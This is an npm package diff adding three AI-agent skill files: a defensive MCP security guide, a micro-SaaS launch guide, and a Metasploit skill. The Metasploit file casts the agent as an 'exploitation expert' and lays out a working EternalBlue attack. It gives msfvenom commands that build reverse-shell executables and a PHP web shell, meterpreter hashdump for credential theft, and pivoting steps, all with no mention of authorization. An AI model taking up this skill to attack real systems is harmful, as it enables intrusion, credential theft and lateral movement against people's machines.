@musashishao/agent-kit 1.8.2 → 1.9.1

package/.agent/skills/mcp-security/SKILL.md

@@ -0,0 +1,314 @@
+---
+name: mcp-security
+description: OAuth 2.1 and security patterns for MCP servers. PKCE, scopes, API keys, sandboxing.
+version: "1.0.0"
+skills:
+  - mcp-builder
+  - vulnerability-scanner
+---
+
+# 🔐 MCP Security Patterns
+
+> Secure your MCP servers with OAuth 2.1, scope-based access control, and enterprise-grade security.
+
+---
+
+## Quick Reference
+
+| File | Purpose |
+|------|---------|
+| [oauth-patterns.md](oauth-patterns.md) | OAuth 2.1 implementation guide |
+| [scope-design.md](scope-design.md) | Scope definition patterns |
+| [api-key-auth.md](api-key-auth.md) | Simple API key authentication |
+
+---
+
+## 1. Security Architecture
+
+```
+┌──────────────────────────────────────────────────────────────┐
+│                  MCP Security Stack                          │
+├──────────────────────────────────────────────────────────────┤
+│  Layer 1: Transport Security                                 │
+│    • TLS 1.3 for all remote connections                     │
+│    • Certificate pinning for sensitive servers              │
+│                                                              │
+│  Layer 2: Authentication                                     │
+│    • OAuth 2.1 with PKCE (recommended)                      │
+│    • API Keys (simpler alternative)                         │
+│    • Dynamic client registration                             │
+│                                                              │
+│  Layer 3: Authorization                                      │
+│    • Scope-based access control                             │
+│    • Tool-level permissions                                 │
+│    • Step-up authorization for sensitive ops                │
+│                                                              │
+│  Layer 4: Runtime Protection                                │
+│    • Input validation (Zod schemas)                         │
+│    • Rate limiting                                          │
+│    • Sandboxing for code execution                          │
+└──────────────────────────────────────────────────────────────┘
+```
+
+---
+
+## 2. OAuth 2.1 Quick Start
+
+### Server-Side (MCP Server)
+
+```typescript
+import { 
+  validateAccessToken, 
+  extractBearerToken,
+  hasScope 
+} from "./auth/oauth.js";
+
+// Middleware to protect MCP endpoint
+function authMiddleware(req, res, next) {
+  const token = extractBearerToken(req);
+  
+  if (!token) {
+    res.status(401).json({ error: "Authentication required" });
+    return;
+  }
+  
+  const result = validateAccessToken(token);
+  
+  if (!result.valid) {
+    res.status(401).json({ error: result.error });
+    return;
+  }
+  
+  req.auth = result;
+  next();
+}
+
+// Check scope before tool execution
+function toolHandler(req, toolName, input) {
+  if (!hasScope(req.auth, `execute:${toolName}`)) {
+    throw new Error("Insufficient scope");
+  }
+  
+  // Execute tool...
+}
+```
+
+### Client-Side (Connecting to MCP)
+
+```typescript
+// 1. Generate PKCE challenge
+const { codeVerifier, codeChallenge } = generatePKCE();
+
+// 2. Redirect to authorization
+const authUrl = new URL(authorizationEndpoint);
+authUrl.searchParams.set("client_id", clientId);
+authUrl.searchParams.set("code_challenge", codeChallenge);
+authUrl.searchParams.set("code_challenge_method", "S256");
+authUrl.searchParams.set("scope", "read:project execute:tools");
+
+// 3. Exchange code for token
+const { accessToken } = await exchangeCode(code, codeVerifier);
+
+// 4. Use token in requests
+fetch(mcpEndpoint, {
+  headers: { "Authorization": `Bearer ${accessToken}` }
+});
+```
+
+---
+
+## 3. Scope Design
+
+### Standard MCP Scopes
+
+| Scope | Description | Risk Level |
+|-------|-------------|------------|
+| `read:project` | Read project context | 🟢 Low |
+| `read:graph` | Read dependency graph | 🟢 Low |
+| `read:search` | Execute search queries | 🟢 Low |
+| `write:sync` | Trigger sync operations | 🟡 Medium |
+| `execute:tools` | Execute MCP tools | 🟡 Medium |
+| `admin:config` | Modify configuration | 🔴 High |
+| `admin:*` | Full admin access | 🔴 Critical |
+
+### Scope Hierarchy
+
+```
+admin:*
+├── admin:config
+├── admin:users
+└── (all other scopes)
+
+execute:*
+├── execute:tools
+└── execute:analysis
+
+write:*
+├── write:sync
+└── write:cache
+
+read:*
+├── read:project
+├── read:graph
+└── read:search
+```
+
+### Tool-to-Scope Mapping
+
+```typescript
+const TOOL_SCOPES = {
+  "get_project_context": ["read:project"],
+  "analyze_dependencies": ["read:graph"],
+  "search_knowledge": ["read:search"],
+  "force_sync": ["write:sync"],
+  "execute_code": ["execute:tools", "admin:config"],
+};
+```
+
+---
+
+## 4. API Key Authentication
+
+For simpler use cases where OAuth is overkill:
+
+```typescript
+// Create API key
+const apiKey = createApiKey("my-app", ["read:project", "read:search"]);
+// Returns: "ak_abc123..."
+
+// Client usage
+fetch(mcpEndpoint, {
+  headers: { "X-API-Key": apiKey }
+});
+
+// Server validation
+const result = validateApiKey(apiKey);
+if (result.valid) {
+  // Proceed with scopes in result.scopes
+}
+```
+
+### When to Use API Keys vs OAuth
+
+| Criteria | API Keys | OAuth 2.1 |
+|----------|----------|-----------|
+| **Use case** | Server-to-server, CLI | Web apps, user context |
+| **Security** | Medium | High |
+| **Rotation** | Manual | Token expiry |
+| **User context** | No | Yes |
+| **Complexity** | Simple | Complex |
+
+---
+
+## 5. Rate Limiting
+
+```typescript
+import { RateLimiter } from "./security/rateLimiter.js";
+
+const limiter = new RateLimiter({
+  windowMs: 60000,  // 1 minute
+  maxRequests: {
+    "read:*": 100,        // 100 reads/min
+    "write:*": 20,        // 20 writes/min
+    "execute:*": 10,      // 10 executions/min
+    "admin:*": 5,         // 5 admin ops/min
+  }
+});
+
+// In middleware
+if (!limiter.allow(req.auth.scope, req.clientId)) {
+  res.status(429).json({ error: "Rate limit exceeded" });
+  return;
+}
+```
+
+---
+
+## 6. Sandboxing Code Execution
+
+For MCP servers that execute code:
+
+```typescript
+import Docker from "dockerode";
+
+async function executeInSandbox(code: string): Promise<string> {
+  const docker = new Docker();
+  
+  const container = await docker.createContainer({
+    Image: "node:20-alpine",
+    Cmd: ["node", "-e", code],
+    NetworkDisabled: true,
+    HostConfig: {
+      Memory: 128 * 1024 * 1024,  // 128MB
+      CpuPeriod: 100000,
+      CpuQuota: 50000,            // 50% CPU
+      ReadonlyRootfs: true,
+    }
+  });
+  
+  await container.start();
+  const logs = await container.logs({ stdout: true, stderr: true });
+  await container.remove({ force: true });
+  
+  return logs.toString();
+}
+```
+
+---
+
+## 7. Security Checklist
+
+### Before Deployment
+
+- [ ] TLS enabled for all remote connections
+- [ ] OAuth 2.1 or API key authentication configured
+- [ ] Scopes defined for all tools
+- [ ] Rate limiting enabled
+- [ ] Input validation on all parameters
+- [ ] Secrets stored in environment variables
+- [ ] Audit logging enabled
+- [ ] Error messages don't leak sensitive info
+
+### Periodic Review
+
+- [ ] Rotate API keys quarterly
+- [ ] Review scope assignments
+- [ ] Audit access logs
+- [ ] Update dependencies
+- [ ] Penetration test annually
+
+---
+
+## 8. Common Vulnerabilities
+
+### OWASP Top 10 for MCP
+
+| Risk | Description | Mitigation |
+|------|-------------|------------|
+| **Injection** | Malicious input in tool params | Zod validation, sanitization |
+| **Broken Auth** | Weak tokens, no expiry | OAuth 2.1, token rotation |
+| **Data Exposure** | Sensitive data in responses | Scope-based filtering |
+| **Broken Access** | Missing authorization checks | Per-tool scope verification |
+| **Misconfiguration** | Default credentials, open ports | Security hardening |
+| **Prompt Injection** | Malicious prompts | Input sanitization |
+
+### Prompt Injection Defense
+
+```typescript
+// Sanitize user input before including in prompts
+function sanitizeForPrompt(input: string): string {
+  // Remove potential control sequences
+  return input
+    .replace(/\[INST\]/gi, "")
+    .replace(/\[\/INST\]/gi, "")
+    .replace(/<<SYS>>/gi, "")
+    .replace(/<\/s>/gi, "")
+    .replace(/Human:/gi, "")
+    .replace(/Assistant:/gi, "")
+    .substring(0, 10000); // Limit length
+}
+```
+
+---
+
+> **Remember:** Security is not optional for MCP servers. These servers have access to codebases, files, and potentially production systems. Treat them with the same security rigor as your production APIs.

package/.agent/skills/metasploit-framework/SKILL.md

@@ -0,0 +1,60 @@
+---
+name: metasploit-framework
+description: "Expert use of the Metasploit Framework (MSF) for exploitation, post-exploitation, and pivoting. Covers msfconsole, msfvenom, and meterpreter."
+version: "1.0.0"
+---
+
+# 🛡️ Metasploit Framework
+
+You are an exploitation expert. You know how to use the world's most popular penetration testing framework to turn a vulnerability into a shell.
+
+---
+
+## The MSF Workflow
+
+1. **Search**: `search eternalblue`
+2. **Select**: `use exploit/windows/smb/ms17_010_eternalblue`
+3. **Configure**: `set RHOSTS 192.168.1.50`, `set LHOST 192.168.1.10`
+4. **Payload**: `set payload windows/x64/meterpreter/reverse_tcp`
+5. **Exploit**: `run` or `exploit`
+
+---
+
+## Meterpreter: The Ultimate Shell
+Once you have a meterpreter session, the real work starts:
+- **`getsystem`**: Attempt automated privilege escalation.
+- **`hashdump`**: Extract local password hashes.
+- **`screenshot`**: See what the user is doing.
+- **`upload/download`**: Transfer files.
+- **`migrate`**: Move the shell into a stable process (e.g., `explorer.exe`).
+
+---
+
+## MSFVenom: Payload Generation
+Create custom payloads for different OS/architectures.
+```bash
+# Windows Reverse Shell EXE
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe
+
+# Linux Reverse Shell ELF
+msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf > shell.elf
+
+# PHP Web Shell
+msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw > shell.php
+```
+
+---
+
+## Pivoting (Lateral Movement)
+Using a compromised machine to reach hidden internal networks.
+1. **Routing**: `route add 10.10.10.0 255.255.255.0 1` (within MSF).
+2. **Port Forward**: `portfwd add -l 8080 -p 80 -r 10.10.10.5`.
+3. **SOCKS Proxy**: `use auxiliary/server/socks_proxy`.
+
+---
+
+## Related Skills
+
+- `ethical-hacking-methodology` - The "Exploitation" phase
+- `active-directory-attacks` - Pivoting inside AD
+- `linux-privilege-escalation` - Post-exploitation focus

package/.agent/skills/micro-saas-launcher/SKILL.md

@@ -0,0 +1,93 @@
+---
+name: micro-saas-launcher
+description: "A comprehensive guide to building, launching, and scaling Micro-SaaS products. Covers lean development, distribution, and monetization."
+version: "1.0.0"
+---
+
+# 🚀 Micro-SaaS Launcher
+
+You are an expert in the "Lean" approach to Micro-SaaS. You focus on solving high-pain, niche problems with minimal code. You value speed, recurring revenue (MRR), and high-leverage marketing.
+
+---
+
+## When to Use This Skill
+
+- Building a new SaaS product from scratch
+- Planning a launch on Product Hunt or Twitter
+- Designing subscription-based monetization
+- Setting up automated customer support and billing
+- Scaling from 0 to $1k MRR
+
+---
+
+## Capabilities
+
+- `lean-saas-architecture`
+- `stripe-integration`
+- `distribution-strategy`
+- `niche-selection`
+- `saas-analytics`
+- `automated-onboarding`
+
+---
+
+## 1. The Lean Stack
+
+| Layer | Recommendation | Rationale |
+|-------|----------------|-----------|
+| **Framework** | Next.js (App Router) | SEO, speed, full-stack |
+| **Auth** | Clerk / Supabase | Done for you security |
+| **DB** | Supabase / Neon | Managed, scales to zero |
+| **Billing** | Stripe (Checkout/Billing) | Industry standard |
+| **Email** | Resend | Developer-friendly |
+| **Hosting** | Vercel / Railway | Zero config |
+
+---
+
+## 2. Distribution (The Engine)
+
+Code is 20%. Distribution is 80%.
+
+- **The Hook**: Free utility tool (e.g., "Free Image Compressor").
+- **Product Hunt**: Targeted launch sequence.
+- **Twitter/X**: Build in public (BIP) strategy.
+- **SEO (Programmatic)**: Generate landing pages for long-tail keywords.
+
+---
+
+## 3. Monetization Patterns
+
+```typescript
+// Stripe-first design
+export const PRICING_PLANS = {
+  FREE: {
+    name: "Free",
+    limit: 5,
+    priceId: null,
+  },
+  PRO: {
+    name: "Pro",
+    limit: "unlimited",
+    priceId: "price_XYZ123",
+    monthlyPrice: 19,
+  }
+};
+```
+
+---
+
+## 4. Micro-SaaS Checklist
+
+- [ ] **Problem Verification**: Did someone say "I would pay for this" in a community?
+- [ ] **Landing Page**: One clear CTA, zero Nav links.
+- [ ] **MVP**: Does it solve the *one* core problem?
+- [ ] **Onboarding**: Time to Value (TTV) < 60 seconds.
+- [ ] **Feedback Loop**: Tally/Typeform for user complaints.
+
+---
+
+## Related Skills
+
+- `ai-wrapper-product` - Often the core of a modern Micro-SaaS
+- `marketing-ideas` - For scaling
+- `nextjs-best-practices` - For technical excellence